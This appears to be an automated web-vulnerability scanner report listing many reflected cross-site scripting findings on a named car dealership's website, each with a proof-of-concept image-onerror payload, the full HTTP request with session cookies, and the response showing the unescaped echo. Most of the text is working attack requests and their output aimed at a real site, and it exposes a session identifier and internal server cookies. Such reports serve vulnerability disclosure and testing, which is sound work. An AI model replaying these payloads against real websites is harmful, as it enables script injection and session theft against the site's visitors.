The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4bf6"><img%20src%3da%20onerror%3dalert(1)>b48455da56c was submitted in the REST URL parameter 2. This input was echoed as a4bf6"><img src=a onerror=alert(1)>b48455da56c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x4a4bf6"><img%20src%3da%20onerror%3dalert(1)>b48455da56c/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:32:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:32:23 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:32:23 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota FJ Cruiser 4x4a4bf6"><img src=a onerror=alert(1)>b48455da56c at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota FJ Cruiser 4x4a4bf6"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee26c<img%20src%3da%20onerror%3dalert(1)>9c3f8e76fb0 was submitted in the REST URL parameter 2. This input was echoed as ee26c<img src=a onerror=alert(1)>9c3f8e76fb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x4ee26c<img%20src%3da%20onerror%3dalert(1)>9c3f8e76fb0/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:39:17 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:39:18 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:39:18 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <H1> Toyota FJ Cruiser 4x4ee26c<img src=a onerror=alert(1)>9c3f8e76fb0</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8122'><img%20src%3da%20onerror%3dalert(1)>37ae5490606 was submitted in the REST URL parameter 2. This input was echoed as a8122'><img src=a onerror=alert(1)>37ae5490606 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x4a8122'><img%20src%3da%20onerror%3dalert(1)>37ae5490606/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:35:48 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:49 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:35:49 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota FJ Cruiser 4
...[SNIP]...
<a href='/quick-quote.html?year=&make=Toyota&model=FJ Cruiser 4x4a8122'><img src=a onerror=alert(1)>37ae5490606'>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db221'><img%20src%3da%20onerror%3dalert(1)>7291df1950f was submitted in the REST URL parameter 2. This input was echoed as db221'><img src=a onerror=alert(1)>7291df1950f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlander%20Hybriddb221'><img%20src%3da%20onerror%3dalert(1)>7291df1950f/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:24:20 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:24:21 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:24:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Highlander H
...[SNIP]...
<a href='/quick-quote.html?year=&make=Toyota&model=Highlander Hybriddb221'><img src=a onerror=alert(1)>7291df1950f'>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 952cc"><img%20src%3da%20onerror%3dalert(1)>086a534c3d5 was submitted in the REST URL parameter 2. This input was echoed as 952cc"><img src=a onerror=alert(1)>086a534c3d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlander%20Hybrid952cc"><img%20src%3da%20onerror%3dalert(1)>086a534c3d5/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:22:02 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:22:03 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:22:03 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Highlander H
...[SNIP]...
<META NAME=DESCRIPTION CONTENT=" Toyota Highlander Hybrid952cc"><img src=a onerror=alert(1)>086a534c3d5 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Highlander Hybrid952cc">
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c236<img%20src%3da%20onerror%3dalert(1)>912be62f461 was submitted in the REST URL parameter 2. This input was echoed as 2c236<img src=a onerror=alert(1)>912be62f461 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlander%20Hybrid2c236<img%20src%3da%20onerror%3dalert(1)>912be62f461/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:26:18 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:26:19 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:26:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Highlander H
...[SNIP]...
<H1> Toyota Highlander Hybrid2c236<img src=a onerror=alert(1)>912be62f461</H1>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a4a"><img%20src%3da%20onerror%3dalert(1)>cc3d7bd15fb was submitted in the REST URL parameter 2. This input was echoed as f0a4a"><img src=a onerror=alert(1)>cc3d7bd15fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlanderf0a4a"><img%20src%3da%20onerror%3dalert(1)>cc3d7bd15fb/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:46 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:46 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:47 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Highlanderf0
...[SNIP]...
<META NAME=DESCRIPTION CONTENT=" Toyota Highlanderf0a4a"><img src=a onerror=alert(1)>cc3d7bd15fb at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Highlanderf0a4a">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80588'><img%20src%3da%20onerror%3dalert(1)>72af12dc3a9 was submitted in the REST URL parameter 2. This input was echoed as 80588'><img src=a onerror=alert(1)>72af12dc3a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlander80588'><img%20src%3da%20onerror%3dalert(1)>72af12dc3a9/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:42:47 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:42:47 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:42:48 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Highlander80
...[SNIP]...
<a href='/quick-quote.html?year=&make=Toyota&model=Highlander80588'><img src=a onerror=alert(1)>72af12dc3a9'>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abc56<img%20src%3da%20onerror%3dalert(1)>f87937a406 was submitted in the REST URL parameter 2. This input was echoed as abc56<img src=a onerror=alert(1)>f87937a406 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlanderabc56<img%20src%3da%20onerror%3dalert(1)>f87937a406/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:45:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:45:53 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:45:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Highlanderab
...[SNIP]...
<H1> Toyota Highlanderabc56<img src=a onerror=alert(1)>f87937a406</H1>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17732"><img%20src%3da%20onerror%3dalert(1)>f539c63831e was submitted in the REST URL parameter 2. This input was echoed as 17732"><img src=a onerror=alert(1)>f539c63831e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Land%20Cruiser17732"><img%20src%3da%20onerror%3dalert(1)>f539c63831e/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:21:51 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:21:51 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:21:52 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Land Cruiser
...[SNIP]...
<META NAME=DESCRIPTION CONTENT=" Toyota Land Cruiser17732"><img src=a onerror=alert(1)>f539c63831e at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Land Cruiser17732">
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4dd3d<img%20src%3da%20onerror%3dalert(1)>a7836b6dd12 was submitted in the REST URL parameter 2. This input was echoed as 4dd3d<img src=a onerror=alert(1)>a7836b6dd12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Land%20Cruiser4dd3d<img%20src%3da%20onerror%3dalert(1)>a7836b6dd12/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:25:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:25:57 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:25:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Land Cruiser
...[SNIP]...
<H1> Toyota Land Cruiser4dd3d<img src=a onerror=alert(1)>a7836b6dd12</H1>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9222'><img%20src%3da%20onerror%3dalert(1)>3782e174f71 was submitted in the REST URL parameter 2. This input was echoed as f9222'><img src=a onerror=alert(1)>3782e174f71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Land%20Cruiserf9222'><img%20src%3da%20onerror%3dalert(1)>3782e174f71/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:23:55 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:23:55 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:23:56 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Land Cruiser
...[SNIP]...
<a href='/quick-quote.html?year=&make=Toyota&model=Land Cruiserf9222'><img src=a onerror=alert(1)>3782e174f71'>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f8d3<img%20src%3da%20onerror%3dalert(1)>4e65e083804 was submitted in the REST URL parameter 2. This input was echoed as 5f8d3<img src=a onerror=alert(1)>4e65e083804 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Matrix5f8d3<img%20src%3da%20onerror%3dalert(1)>4e65e083804/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:53:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:53:22 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:53:23 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Matrix5f8d3<
...[SNIP]...
<H1> Toyota Matrix5f8d3<img src=a onerror=alert(1)>4e65e083804</H1>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee7f"><img%20src%3da%20onerror%3dalert(1)>3d04ab31bd was submitted in the REST URL parameter 2. This input was echoed as 6ee7f"><img src=a onerror=alert(1)>3d04ab31bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Matrix6ee7f"><img%20src%3da%20onerror%3dalert(1)>3d04ab31bd/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:49:35 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:49:35 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:49:36 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE> Toyota Matrix6ee7f"
...[SNIP]...
<META NAME=DESCRIPTION CONTENT=" Toyota Matrix6ee7f"><img src=a onerror=alert(1)>3d04ab31bd at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Matrix6ee7f">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7704d'><img%20src%3da%20onerror%3dalert(1)>98ea0fa9a06 was submitted in the REST URL parameter 2. This input was echoed as 7704d'><img src=a onerror=alert(1)>98ea0fa9a06 in the application's response.
